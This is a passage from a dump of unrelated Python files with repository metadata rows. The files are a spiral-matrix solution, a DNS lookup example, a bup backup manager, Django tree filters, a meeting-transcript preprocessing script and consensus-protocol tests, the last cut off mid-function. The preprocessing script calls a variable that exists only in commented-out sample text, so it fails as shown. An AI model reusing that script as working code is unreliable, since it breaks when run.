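# Re-implementation of the longest-first pair truncation shown above.
def truncate_seq_pair(tokens_a, tokens_b, max_length):
    while len(tokens_a) + len(tokens_b) > max_length:
        # Always trim the currently longer sequence from its end
        if len(tokens_a) > len(tokens_b):
            tokens_a.pop()
        else:
            tokens_b.pop()

a = list("abcdef")  # 6 tokens
b = list("xy")      # 2 tokens
truncate_seq_pair(a, b, 5)
print(a, b)
```

Trimming the longer sequence first keeps both sides as balanced as possible, which is why the loop re-checks the lengths on every iteration instead of truncating each side by a fixed amount.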
bb43fdde5b3581f834a97b398a6070ff285448c9 | 1,204 | py | Python | spiralOrder.py | xiaochuan-cd/leetcode | 8da7fb9c1a8344f5f258936c8a7d6cd25d3b3393 | [
"MIT"
] | null | null | null | spiralOrder.py | xiaochuan-cd/leetcode | 8da7fb9c1a8344f5f258936c8a7d6cd25d3b3393 | [
"MIT"
] | null | null | null | spiralOrder.py | xiaochuan-cd/leetcode | 8da7fb9c1a8344f5f258936c8a7d6cd25d3b3393 | [
"MIT"
] | null | null | null |
class Solution:
    def spiralOrder(self, matrix):
        """
        :type matrix: List[List[int]]
        :rtype: List[int]
        """
        if not matrix:
            return []
        lvl, lenw, lenh, ret = 0, len(matrix[0]), len(matrix), []
        while lvl <= int(min(lenw, lenh) / 2):
            if len(ret) != lenh * lenw:
                for i in range(lvl, lenw - lvl):
                    ret.append(matrix[lvl][i])
            if len(ret) != lenh * lenw:
                for i in range(lvl + 1, lenh - lvl):
                    ret.append(matrix[i][lenw - lvl - 1])
            if len(ret) != lenh * lenw:
                for i in range(lenw - lvl - 2, -1 + lvl, -1):
                    ret.append(matrix[lenh - lvl - 1][i])
            if len(ret) != lenh * lenw:
                for i in range(lenh - lvl - 2, lvl, -1):
                    ret.append(matrix[i][lvl])
            lvl += 1
        return ret


if __name__ == "__main__":
    print(Solution().spiralOrder(
        [
            [1]
        ]
    ))
    print(Solution().spiralOrder(
        [
            [1, 2, 3, 4],
            [5, 6, 7, 8],
            [9, 10, 11, 12],
            [13, 14, 15, 16],
            [17, 18, 19, 20]
        ]
    ))
bb44989d1b925d469bd603867f4a7ffaa3d4a4d3 | 400 | py | Python | lang/py/pylib/11/socket/function/gethostbyname_ex.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/pylib/11/socket/function/gethostbyname_ex.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/pylib/11/socket/function/gethostbyname_ex.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import socket

for host in ['homer', 'www', 'www.python.org', 'nosuchnamenamenameche']:
    print(host)
    try:
        hostname, aliases, addresses = socket.gethostbyname_ex(host)
        print('  Hostname:', hostname)
        print('  Aliases:', aliases)
        print('  Addresses:', addresses)
    except socket.error as msg:
        print('ERROR:', msg)
    print()
| 25 | 69 | 0.63 | 46 | 400 | 5.456522 | 0.586957 | 0.063745 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003257 | 0.2325 | 400 | 15 | 70 | 26.666667 | 0.814332 | 0.1025 | 0 | 0 | 0 | 0 | 0.229692 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.545455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
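The lookup loop above can be restructured around an injectable resolver so the formatting logic is testable without touching DNS; `describe_host` and the fake resolver below are illustrative names, not part of the original script:

```python
import socket

def describe_host(host, resolver=socket.gethostbyname_ex):
    # resolver is injectable so this can run without a network lookup
    try:
        hostname, aliases, addresses = resolver(host)
    except OSError as msg:  # socket.error is an alias of OSError in Python 3
        return ["ERROR: " + str(msg)]
    return ["  Hostname: " + hostname,
            "  Aliases: " + str(aliases),
            "  Addresses: " + str(addresses)]

fake = lambda h: (h + ".example", [], ["127.0.0.1"])
print(describe_host("homer", resolver=fake))
```

With the default resolver this behaves like the script above; a failed lookup surfaces as an `ERROR:` line instead of an unhandled exception.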
bb44aa42ddd32a1beb60abcb2a915654994335c3 | 7,786 | py | Python | bups/manager.py | emersion/bups | 95dac7fabe8261dfff3bccad1e384af07c702945 | [
"MIT"
] | 106 | 2015-01-02T11:11:39.000Z | 2022-01-09T08:03:30.000Z | bups/manager.py | emersion/bups | 95dac7fabe8261dfff3bccad1e384af07c702945 | [
"MIT"
] | 33 | 2015-01-01T15:01:38.000Z | 2020-09-06T15:13:49.000Z | bups/manager.py | emersion/bups | 95dac7fabe8261dfff3bccad1e384af07c702945 | [
"MIT"
] | 15 | 2015-02-01T10:38:20.000Z | 2022-02-08T21:45:44.000Z |
import os
import time
import subprocess
import tempfile
import re
from worker import BupWorker
#from sudo import sudo
from fuse.root import FuseRoot
from fuse.bup import FuseBup
from fuse.sshfs import FuseSshfs
from fuse.google_drive import FuseGoogleDrive
from fuse.encfs import FuseEncfs
def noop(*args):
    pass
class BupManager:
    def __init__(self, cfg, sudo_worker=None):
        self.config = cfg
        self.sudo_worker = sudo_worker
        self.mounted = False
        self.bup = BupWorker()
        self.bup_mounter = None

        # FS parents
        mount_cfg = self.config["mount"]
        mount_type = mount_cfg.get("type", "")
        if mount_type == "":
            self.parents = []
        elif mount_type == "google_drive":
            self.parents = [FuseGoogleDrive(mount_cfg)]
        elif mount_type == "sshfs":
            self.parents = [FuseSshfs(mount_cfg)]
        else:
            self.parents = [FuseRoot(mount_cfg)]
        if mount_cfg.get("encrypt", False):
            self.parents.append(FuseEncfs())
    def backup(self, callbacks={}):
        callbacks_names = ["onstatus", "onerror", "onprogress", "onfinish", "onabord"]
        for name in callbacks_names:
            if name not in callbacks:
                callbacks[name] = noop
        ctx = {}

        def backupDir(dir_data):
            dirpath = dir_data["path"].encode("ascii")
            backupName = dir_data["name"].encode("ascii")
            excludePaths = [x.encode("ascii") for x in dir_data.get("exclude", [])]
            excludeRxs = [x.encode("ascii") for x in dir_data.get("excluderx", [])]
            ctx = {
                "path": dirpath,
                "name": backupName
            }

            def status2progress(line):
                m = re.search(r"Indexing:\s*(\d+)((?:,\s*done)?)\s*\((\d+) paths/s\)", line)
                if m is not None:
                    percentage = None
                    if m.group(2) != "":
                        percentage = 100
                    return {
                        'status': 'indexing',
                        'percentage': percentage,
                        'total_paths': int(m.group(1)),
                        'paths_per_sec': int(m.group(3))
                    }
                m = re.search(r"Reading index:\s*(\d+)((?:,\s*done)?)", line)
                if m is not None:
                    percentage = None
                    if m.group(2) != "":
                        percentage = 100
                    return {
                        'status': 'reading_index',
                        'percentage': percentage,
                        'files_done': int(m.group(1))
                    }
                m = re.search(r"Saving:\s*([\d.]+)%\s*\((\d+)/(\d+)k, (\d+)/(\d+) files\)", line)
                if m is not None:
                    return {
                        'status': 'saving',
                        'percentage': float(m.group(1)),
                        'bytes_done': int(m.group(2)),
                        'bytes_total': int(m.group(3)),
                        'files_done': int(m.group(4)),
                        'files_total': int(m.group(5))
                    }
                return None

            def onprogress(data):
                return callbacks["onprogress"](data, ctx)

            def onstatus(line):
                progress = status2progress(line)
                if progress is not None:
                    return callbacks["onprogress"](progress, ctx)
                return callbacks["onstatus"](line, ctx)

            callbacks["onstatus"]("Backing up " + backupName + ": indexing files...", ctx)
            self.bup.index(dirpath, {
                "exclude_paths": excludePaths,
                "exclude_rxs": excludeRxs,
                "one_file_system": dir_data.get("onefilesystem", False)
            }, {
                "onprogress": onprogress,
                "onstatus": onstatus
            })
            callbacks["onstatus"]("Backing up " + backupName + ": saving files...", ctx)
            self.bup.save(dirpath, {
                "name": backupName,
                "progress": True
            }, {
                "onprogress": onprogress,
                "onstatus": onstatus
            })

        cfg = self.config
        callbacks["onstatus"]("Mounting filesystem...", ctx)
        if not self.mount_parents(callbacks):
            callbacks["onabord"]({}, ctx)
            return
        callbacks["onstatus"]("Initializing bup...", ctx)
        self.bup.init({
            "onstatus": lambda line: callbacks["onstatus"](line, ctx)
        })
        for dir_data in cfg["dirs"]:
            backupDir(dir_data)
        time.sleep(1)
        callbacks["onstatus"]("Unmounting filesystem...", ctx)
        self.unmount_parents(callbacks)
        callbacks["onstatus"]('Backup finished.', ctx)
        callbacks["onfinish"]({}, ctx)
    def restore(self, opts, callbacks={}):
        callbacks_names = ["onstatus", "onerror", "onprogress", "onfinish", "onabord"]
        for name in callbacks_names:
            if name not in callbacks:
                callbacks[name] = noop
        callbacks["onstatus"]("Mounting filesystem...")
        if not self.mount_parents(callbacks):
            callbacks["onabord"]()
            return
        from_path = opts.get("from").encode("ascii")
        to_path = opts.get("to").encode("ascii")
        callbacks["onstatus"]("Restoring " + from_path + " to " + to_path + "...")
        self.bup.restore(from_path, to_path, callbacks)
        time.sleep(1)
        callbacks["onstatus"]("Unmounting filesystem...")
        self.unmount_parents(callbacks)
        callbacks["onstatus"]("Restoration finished.")
        callbacks["onfinish"]()
    def mount(self, callbacks={}):
        if "onstatus" not in callbacks:
            callbacks["onstatus"] = noop
        if "onerror" not in callbacks:
            callbacks["onerror"] = noop
        if "onready" not in callbacks:
            callbacks["onready"] = noop
        if "onabord" not in callbacks:
            callbacks["onabord"] = noop
        cfg = self.config
        callbacks["onstatus"]("Mounting filesystem...")
        if not self.mount_parents({
            'onerror': lambda msg, ctx: callbacks["onerror"](msg)
        }):
            callbacks["onabord"]()
            return
        callbacks["onstatus"]("Initializing bup...")
        mounter = FuseBup(self.bup)
        mount_path = tempfile.mkdtemp(prefix="bups-bup-")
        try:
            mounter.mount(mount_path)
        except Exception as e:
            callbacks["onerror"]("WARN: " + str(e) + "\n")
        self.bup_mounter = mounter
        callbacks["onstatus"]('Bup fuse filesystem mounted.')
        self.mounted = True
        callbacks["onready"]({
            "path": mounter.get_inner_path()
        })
    def unmount(self, callbacks={}):
        if "onstatus" not in callbacks:
            callbacks["onstatus"] = noop
        if "onerror" not in callbacks:
            callbacks["onerror"] = noop
        if "onfinish" not in callbacks:
            callbacks["onfinish"] = noop
        if self.bup_mounter is None:
            return
        callbacks["onstatus"]("Unmounting bup filesystem...")
        try:
            self.bup_mounter.unmount()
        except Exception as e:
            callbacks["onerror"]("WARN: " + str(e) + "\n")
        callbacks["onstatus"]("Unmounting filesystem...")
        self.unmount_parents({
            'onerror': lambda msg, ctx: callbacks["onerror"](msg)
        })
        self.mounted = False
        callbacks["onfinish"]({})
    def parents_need_sudo(self):
        for mounter in self.parents:
            if isinstance(mounter, FuseRoot):
                return True
        return False

    def mount_log(self, msg):
        if self.sudo_worker is not None:
            return
        print(msg)
    def mount_parents(self, callbacks={}):
        if "onerror" not in callbacks:
            callbacks["onerror"] = noop
        if self.parents_need_sudo() and self.sudo_worker is not None:
            res = self.sudo_worker.proxy_command("mount", callbacks)
            if res["success"]:
                self.bup.set_dir(res["bup_path"])
            return res["success"]
        mount_cfg = self.config["mount"]
        last_mount_path = self.bup.get_default_dir()
        if mount_cfg.get("type", "") == "" and mount_cfg.get("path", "") != "":
            last_mount_path = os.path.expanduser(mount_cfg["path"])
        for mounter in self.parents:
            mount_path = tempfile.mkdtemp(prefix="bups-" + mounter.get_type() + "-")
            self.mount_log("Mounting " + mounter.get_type() + " on " + mount_path)
            try:
                mounter.mount(mount_path, last_mount_path)
            except Exception as e:
                callbacks["onerror"]("ERR: " + str(e) + "\n", {})
                return False
            last_mount_path = mounter.get_inner_path()
        self.mount_log("Backup dir is " + last_mount_path)
        self.bup.set_dir(last_mount_path)
        return True
    def unmount_parents(self, callbacks={}):
        if "onerror" not in callbacks:
            callbacks["onerror"] = noop
        if self.parents_need_sudo() and self.sudo_worker is not None:
            return self.sudo_worker.proxy_command("unmount", callbacks)["success"]
        for mounter in reversed(self.parents):
            self.mount_log("Unmounting " + mounter.get_type() + " on " + mounter.get_mount_path())
            try:
                mounter.unmount()
            except Exception as e:
                callbacks["onerror"]("ERR: " + str(e) + "\n", {})
                return False
        return True
| 25.953333 | 84 | 0.656563 | 984 | 7,786 | 5.079268 | 0.158537 | 0.064626 | 0.044018 | 0.012005 | 0.444378 | 0.353742 | 0.322929 | 0.262505 | 0.231693 | 0.181673 | 0 | 0.003128 | 0.178911 | 7,786 | 299 | 85 | 26.040134 | 0.778664 | 0.00411 | 0 | 0.39485 | 0 | 0.004292 | 0.190789 | 0.013932 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.004292 | 0.04721 | null | null | 0.004292 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
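The `status2progress` helper inside `backup` above turns bup's textual progress lines into structured events. A standalone sketch of its "Saving" branch (the sample line is illustrative, not captured bup output):

```python
import re

def parse_saving(line):
    # Mirrors the "Saving" branch of status2progress above
    m = re.search(r"Saving:\s*([\d.]+)%\s*\((\d+)/(\d+)k, (\d+)/(\d+) files\)", line)
    if m is None:
        return None
    return {
        'status': 'saving',
        'percentage': float(m.group(1)),
        'bytes_done': int(m.group(2)),
        'bytes_total': int(m.group(3)),
        'files_done': int(m.group(4)),
        'files_total': int(m.group(5)),
    }

print(parse_saving("Saving: 12.5% (128/1024k, 3/40 files)"))
```

Returning `None` for non-matching lines lets the caller fall back to a plain status callback, exactly as `onstatus` does above.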
bb464176e752765ae17771663cfb6e6d7f9714b9 | 1,177 | py | Python | integreat_cms/cms/templatetags/tree_filters.py | Integreat/cms-v2 | c79a54fd5abb792696420aa6427a5e5a356fa79c | [
"Apache-2.0"
] | 21 | 2018-10-26T20:10:45.000Z | 2020-10-22T09:41:46.000Z | integreat_cms/cms/templatetags/tree_filters.py | Integreat/cms-v2 | c79a54fd5abb792696420aa6427a5e5a356fa79c | [
"Apache-2.0"
] | 392 | 2018-10-25T08:34:07.000Z | 2020-11-19T08:20:30.000Z | integreat_cms/cms/templatetags/tree_filters.py | Integreat/cms-v2 | c79a54fd5abb792696420aa6427a5e5a356fa79c | [
"Apache-2.0"
] | 23 | 2019-03-06T17:11:35.000Z | 2020-10-16T04:36:41.000Z |
"""
This is a collection of tags and filters for models which inherit from the MPTT model
:class:`~integreat_cms.cms.models.abstract_tree_node.AbstractTreeNode`
(:class:`~integreat_cms.cms.models.pages.page.Page` and
:class:`~integreat_cms.cms.models.languages.language_tree_node.LanguageTreeNode`).
"""
from django import template
register = template.Library()
@register.filter
def get_descendant_ids(node):
    """
    This filter returns the ids of all the node's descendants.

    :param node: The requested node
    :type node: ~integreat_cms.cms.models.abstract_tree_node.AbstractTreeNode

    :return: The list of all the node's descendants' ids
    :rtype: list [ int ]
    """
    return [
        descendant.id for descendant in node.get_cached_descendants(include_self=True)
    ]
@register.filter
def get_children_ids(node):
    """
    This filter returns the ids of all the node's direct children.

    :param node: The requested node
    :type node: ~integreat_cms.cms.models.abstract_tree_node.AbstractTreeNode

    :return: The list of all the node's children's ids
    :rtype: list [ int ]
    """
    return [child.id for child in node.cached_children]
| 29.425 | 86 | 0.731521 | 167 | 1,177 | 5.02994 | 0.347305 | 0.071429 | 0.089286 | 0.125 | 0.57619 | 0.458333 | 0.432143 | 0.432143 | 0.369048 | 0.369048 | 0 | 0 | 0.172472 | 1,177 | 39 | 87 | 30.179487 | 0.862423 | 0.661852 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
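The two filters above only rely on `get_cached_descendants(include_self=True)`, `cached_children`, and `.id`. A minimal stand-in node class (hypothetical, not the real MPTT API) shows the expected output shape:

```python
class FakeNode:
    # Hypothetical stand-in exposing just the attributes the filters use
    def __init__(self, id, children=None):
        self.id = id
        self.cached_children = children or []

    def get_cached_descendants(self, include_self=False):
        # Depth-first traversal, matching a pre-order descendant listing
        nodes = [self] if include_self else []
        for child in self.cached_children:
            nodes += child.get_cached_descendants(include_self=True)
        return nodes

def get_descendant_ids(node):
    return [d.id for d in node.get_cached_descendants(include_self=True)]

def get_children_ids(node):
    return [child.id for child in node.cached_children]

root = FakeNode(1, [FakeNode(2, [FakeNode(4)]), FakeNode(3)])
print(get_descendant_ids(root), get_children_ids(root))
```

Note that `get_descendant_ids` includes the node itself, while `get_children_ids` lists only direct children.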
bb4652a753ab3b1a67b9185a0d10ad240ff3d243 | 5,220 | py | Python | Preprocess.py | Rawan19/HMNet | 2aa8de20558412c1adb15fac69f18f50d6f59227 | [
"MIT"
] | null | null | null | Preprocess.py | Rawan19/HMNet | 2aa8de20558412c1adb15fac69f18f50d6f59227 | [
"MIT"
] | null | null | null | Preprocess.py | Rawan19/HMNet | 2aa8de20558412c1adb15fac69f18f50d6f59227 | [
"MIT"
] | null | null | null |
import json
import spacy
from nltk.tokenize import word_tokenize
import nltk
nltk.download('punkt')
# print("argss:")
# print(sys.argv[0])
# text = sys.argv[0]
print("Preprocessing the input file ...")
import gzip


def preprocess_raw(raw_text: str):
    json_dict_outer = {}
    json_dict_outer['id'] = "1"
    nlp = spacy.load('en', parser=False)
    # nlp_spacy = spacy.load("en_core_web_sm")
    # Index 0 is reserved for unknown tags via the leading '' entry
    POS = {w: i for i, w in enumerate([''] + list(nlp.tagger.labels))}
    ENT = {w: i for i, w in enumerate([''] + nlp.entity.move_names)}
    name_role_dict = {'A': 'PM', 'B': 'ID', 'C': 'UI', 'D': 'ME'}
    list_dicts = []
    turns = raw_text.split('\n')
    for turn in turns:
        if len(turn) < 1:
            continue
        json_dict = {}
        name = turn.split(":", 1)[0]
        json_dict['speaker'] = name
        json_dict['role'] = name_role_dict[name]
        word_text = turn.split(":", 1)[1]
        output = {'word': word_tokenize(word_text), 'pos_id': [], 'ent_id': []}
        for token in nlp(word_text):
            pos = token.tag_
            output['pos_id'].append(POS[pos] if pos in POS else 0)
            ent = 'O' if token.ent_iob_ == 'O' else (token.ent_iob_ + '-' + token.ent_type_)
            output['ent_id'].append(ENT[ent] if ent in ENT else 0)
        json_dict['utt'] = output
        list_dicts.append(json_dict)
    json_dict_outer['meeting'] = list_dicts
    json_dict_outer['summary'] = [""]
    with open('test_raw2.jsonl', 'w') as outfile:
        for entry in [json_dict_outer]:
            # print(entry)
            json.dump(entry, outfile)
            outfile.write('\n')
    with open('test_raw2.jsonl', 'rb') as f_in, \
            gzip.open('ExampleRawData/meeting_summarization/AMI_proprec/test/test_raw2.jsonl.gz', 'wb') as f_out:
        f_out.writelines(f_in)


print("Preprocessing is complete! The new test file was created at the following path: ExampleRawData/meeting_summarization/AMI_proprec/test/test_raw2.jsonl.gz")
# text = """
# Ashwin Swarup:Alright, let's let's start then. So, welcome to the Daily call. So I wanted a basic update on where we are on ditto, so mitesh can even brought update on that.
# Mitesh Gupta: Oh yeah. So deter we have finally our position was in this Marketplace and we have got our latest app available on the marketplace with the updates, about the installation steps and new screenshots. We are waiting to put a new video so that will get a new release next week. Next early. Next week, as well as we're in talk with the Eric, the representative
# Mitesh Gupta:person of zendes where you can help us with the marketing of video. So we are all
# Ashwin Swarup:No. Yeah I also got a video the latest video from anitage and looks good. So I send it for approval to my. So let's see if If you approves it, I will set it up on the detail. but,
# Mitesh Gupta:Corporation, then we can work.
# Ashwin Swarup:But on the whole, it looks good.
# Mitesh Gupta:Yeah. And as well as what I have seen. I have also seen the Google analytics page for dito and I've seen around 8 to 15 requests are there. Like people have visited to our little page,
# Ashwin Swarup:That's good. So I mean, the initial days two days since deployment. Let's see how it goes. All right, what's the status on Chiron?
# Siddhant Bane:Yeah. So in terms of testing we have we are done with our unit tests and today we have pushed them I think with it can review them and basically approve our pull request and we will be done with that apart from that we are working on the chat server where like we discussed in yesterday's meeting, we are going to incorporate handoff feature and Also, the scalability issues that we were facing, we're going to address. From that Shashank can update.
# Shashank M:Oh yeah. So from my side, I had a few Test cases remaining. And as, after that, udit also told me to make a few more code changes to the API for the document passing an intense generation. So we made a, we made the remaining changes and I've pushed the code and with the HTTP action file on the HTTP download and upload code, which I had written. So I've put the changes for that as well. So I just have to sit with Throne to make the UI changes. So yeah so after that I'm done with the unit test case now I just have a few Service Test cases remaining. So once I'm done with that, I'll push it to get
# Ashwin Swarup:And the knowledge graph test cases are also done the part where we were trying to do question augmentation test cases now that that needs to still start.
# Shashank M:With the knowledge craft test cases. So it's divided into two and that one is the document passing. And then the Generation. The addition of the training.
# Ashwin Swarup: Yeah.
# Shashank M: So So the first one, the document passing test cases are all done so the other one which was to add the generated intense and responses for that. We were facing a few issues. So with its help you were able to just you know just get the edge cases out. So if it's failing we're giving the particular the necessary output messages. So yeah, that's all done.
# Ashwin Swarup: All right. Sounds good. Thanks a lot, guys.
# """
if __name__ == "__main__":
    import sys

    # `text` was only defined in the commented-out sample above; take the path
    # of a raw transcript file as the first command-line argument instead.
    with open(sys.argv[1]) as f:
        preprocess_raw(f.read())
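The per-turn parsing above needs no spaCy or NLTK to understand: each transcript line is `"<speaker>: <utterance>"`, and single-letter speakers map to AMI roles. A dependency-free sketch of just that step (the `parse_turn` helper is illustrative, not part of the original script):

```python
# Each turn is "<speaker>: <utterance>"; speakers A-D map to AMI meeting roles.
name_role_dict = {'A': 'PM', 'B': 'ID', 'C': 'UI', 'D': 'ME'}


def parse_turn(turn):
    # split(":", 1) keeps colons inside the utterance intact
    name, word_text = turn.split(":", 1)
    return {'speaker': name, 'role': name_role_dict[name], 'utt': word_text.strip()}


print(parse_turn("A: Welcome to the daily call."))
# {'speaker': 'A', 'role': 'PM', 'utt': 'Welcome to the daily call.'}
```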
# === src/bos_consensus/blockchain/test_blockchain.py (LuffyEMonkey/isaac-consensus-protocol, Apache-2.0) ===
from ..common import Ballot, BallotVotingResult, Message, node_factory
from ..network import Endpoint
from ..blockchain import Blockchain
from ..consensus import get_fba_module
from ..consensus.fba.isaac import IsaacState
from .util import StubTransport
IsaacConsensus = get_fba_module('isaac').IsaacConsensus
def blockchain_factory(name, address, threshold, validator_endpoint_uris):
    node = node_factory(name, Endpoint.from_uri(address))
    validators = list()
    for uri in validator_endpoint_uris:
        validators.append(
            node_factory(uri, Endpoint.from_uri(uri)),
        )

    consensus = IsaacConsensus(node, threshold, validators)
    return Blockchain(
        consensus,
        StubTransport()
    )
def test_consensus_instantiation():
    blockchain = blockchain_factory(
        'n1',
        'http://localhost:5001',
        100,
        ['http://localhost:5002', 'http://localhost:5003'])

    assert blockchain.node_name == 'n1'
    assert blockchain.endpoint.uri_full == 'http://localhost:5001?name=n1'
    assert blockchain.consensus.threshold == 100
IsaacConsensus.transport = StubTransport()
def test_state_init_to_sign():
    node_name_1 = 'http://localhost:5001'
    node_name_2 = 'http://localhost:5002'
    node_name_3 = 'http://localhost:5003'

    bc1 = blockchain_factory(
        node_name_1,
        'http://localhost:5001',
        100,
        [node_name_2, node_name_3]
    )
    bc2 = blockchain_factory(
        node_name_2,
        'http://localhost:5002',
        100,
        [node_name_1, node_name_3]
    )
    bc3 = blockchain_factory(
        node_name_3,
        'http://localhost:5003',
        100,
        [node_name_1, node_name_2]
    )

    bc1.consensus.add_to_validator_connected(bc2.node)
    bc1.consensus.add_to_validator_connected(bc3.node)
    bc1.consensus.init()

    message = Message.new('message')
    ballot_init_1 = Ballot.new(node_name_1, message, IsaacState.INIT, BallotVotingResult.agree)
    ballot_id = ballot_init_1.ballot_id
    ballot_init_2 = Ballot(ballot_id, node_name_2, message, IsaacState.INIT, BallotVotingResult.agree,
                           ballot_init_1.timestamp)
    ballot_init_3 = Ballot(ballot_id, node_name_3, message, IsaacState.INIT, BallotVotingResult.agree,
                           ballot_init_1.timestamp)

    bc1.receive_ballot(ballot_init_1)
    bc1.receive_ballot(ballot_init_2)
    bc1.receive_ballot(ballot_init_3)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_1) == IsaacState.SIGN
def test_state_init_to_all_confirm_sequence():
    node_name_1 = 'http://localhost:5001'
    node_name_2 = 'http://localhost:5002'
    node_name_3 = 'http://localhost:5003'

    bc1 = blockchain_factory(
        node_name_1,
        'http://localhost:5001',
        100,
        [node_name_2, node_name_3],
    )
    bc2 = blockchain_factory(
        node_name_2,
        'http://localhost:5002',
        100,
        [node_name_1, node_name_3],
    )
    bc3 = blockchain_factory(
        node_name_3,
        'http://localhost:5003',
        100,
        [node_name_1, node_name_2],
    )

    bc1.consensus.add_to_validator_connected(bc2.node)
    bc1.consensus.add_to_validator_connected(bc3.node)
    bc1.consensus.init()

    bc2.consensus.add_to_validator_connected(bc1.node)
    bc2.consensus.add_to_validator_connected(bc3.node)
    bc2.consensus.init()

    bc3.consensus.add_to_validator_connected(bc1.node)
    bc3.consensus.add_to_validator_connected(bc2.node)
    bc3.consensus.init()

    message = Message.new('message')
    ballot_init_1 = Ballot.new(node_name_1, message, IsaacState.INIT, BallotVotingResult.agree)
    ballot_id = ballot_init_1.ballot_id
    ballot_init_2 = Ballot(ballot_id, node_name_2, message, IsaacState.INIT, BallotVotingResult.agree,
                           ballot_init_1.timestamp)
    ballot_init_3 = Ballot(ballot_id, node_name_3, message, IsaacState.INIT, BallotVotingResult.agree,
                           ballot_init_1.timestamp)

    bc1.receive_ballot(ballot_init_1)
    bc1.receive_ballot(ballot_init_2)
    bc1.receive_ballot(ballot_init_3)

    bc2.receive_ballot(ballot_init_1)
    bc2.receive_ballot(ballot_init_2)
    bc2.receive_ballot(ballot_init_3)

    bc3.receive_ballot(ballot_init_1)
    bc3.receive_ballot(ballot_init_2)
    bc3.receive_ballot(ballot_init_3)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN
    assert bc2.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN
    assert bc3.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN

    ballot_sign_1 = Ballot(ballot_id, node_name_1, message, IsaacState.SIGN, BallotVotingResult.agree,
                           ballot_init_1.timestamp)
    ballot_sign_2 = Ballot(ballot_id, node_name_2, message, IsaacState.SIGN, BallotVotingResult.agree,
                           ballot_init_1.timestamp)
    ballot_sign_3 = Ballot(ballot_id, node_name_3, message, IsaacState.SIGN, BallotVotingResult.agree,
                           ballot_init_1.timestamp)

    bc1.receive_ballot(ballot_sign_1)
    bc1.receive_ballot(ballot_sign_2)
    bc1.receive_ballot(ballot_sign_3)

    bc2.receive_ballot(ballot_sign_1)
    bc2.receive_ballot(ballot_sign_2)
    bc2.receive_ballot(ballot_sign_3)

    bc3.receive_ballot(ballot_sign_1)
    bc3.receive_ballot(ballot_sign_2)
    bc3.receive_ballot(ballot_sign_3)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
    assert bc2.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
    assert bc3.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT

    ballot_accept_1 = Ballot(ballot_id, node_name_1, message, IsaacState.ACCEPT, BallotVotingResult.agree,
                             ballot_init_1.timestamp)
    ballot_accept_2 = Ballot(ballot_id, node_name_2, message, IsaacState.ACCEPT, BallotVotingResult.agree,
                             ballot_init_1.timestamp)
    ballot_accept_3 = Ballot(ballot_id, node_name_3, message, IsaacState.ACCEPT, BallotVotingResult.agree,
                             ballot_init_1.timestamp)

    bc1.receive_ballot(ballot_sign_1)  # different state ballot
    bc1.receive_ballot(ballot_accept_2)
    bc1.receive_ballot(ballot_accept_3)

    bc2.receive_ballot(ballot_accept_1)
    bc2.receive_ballot(ballot_accept_2)
    bc2.receive_ballot(ballot_sign_3)  # different state ballot

    bc3.receive_ballot(ballot_accept_1)
    bc3.receive_ballot(ballot_accept_2)
    bc3.receive_ballot(ballot_accept_3)

    assert message in bc1.consensus.messages
    assert bc2.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
    assert message in bc3.consensus.messages
def test_state_jump_from_init():
    node_name_1 = 'http://localhost:5001'
    node_name_2 = 'http://localhost:5002'
    node_name_3 = 'http://localhost:5003'
    node_name_4 = 'http://localhost:5004'

    bc1 = blockchain_factory(
        node_name_1,
        'http://localhost:5001',
        100,
        [node_name_2, node_name_3, node_name_4],
    )
    bc2 = blockchain_factory(
        node_name_2,
        'http://localhost:5002',
        100,
        [node_name_1, node_name_3, node_name_4],
    )
    bc3 = blockchain_factory(
        node_name_3,
        'http://localhost:5003',
        100,
        [node_name_1, node_name_2, node_name_4],
    )
    bc4 = blockchain_factory(
        node_name_4,
        'http://localhost:5004',
        100,
        [node_name_1, node_name_2, node_name_3],
    )

    bc1.consensus.add_to_validator_connected(bc2.node)
    bc1.consensus.add_to_validator_connected(bc3.node)
    bc1.consensus.add_to_validator_connected(bc4.node)
    bc1.consensus.init()

    message = Message.new('message')
    ballot_init_2 = Ballot.new(node_name_2, message, IsaacState.INIT, BallotVotingResult.agree)
    ballot_id = ballot_init_2.ballot_id
    ballot_init_3 = Ballot(ballot_id, node_name_3, message, IsaacState.INIT, BallotVotingResult.agree,
                           ballot_init_2.timestamp)
